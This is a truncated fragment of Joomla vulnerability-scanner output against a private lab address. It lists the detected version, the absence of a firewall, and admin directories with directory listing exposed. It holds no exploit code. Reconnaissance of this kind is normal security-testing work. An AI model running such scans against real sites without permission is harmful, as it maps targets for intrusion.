http://192.168.32.222/joomla/ ... [+] FireWall Detector [++] Firewall not detected [+] Detecting Joomla Version [++] Joomla 3.7.3rc1 [+] Core Joomla Vulnerability [++] Target Joomla core is not vulnerable [+] Checking Directory Listing [++] directory has directory listing : http://192.168.32.222/joomla/administrator/components http://192.168.32.222/joomla/administrator/modules http://192.168.32.222/joomla/administrator/templates http://192.168.32.222/joomla/images/banners [+] Checking apache info/status files [++] Readable inf", "category": "text_analysis", "source": "security_papers"}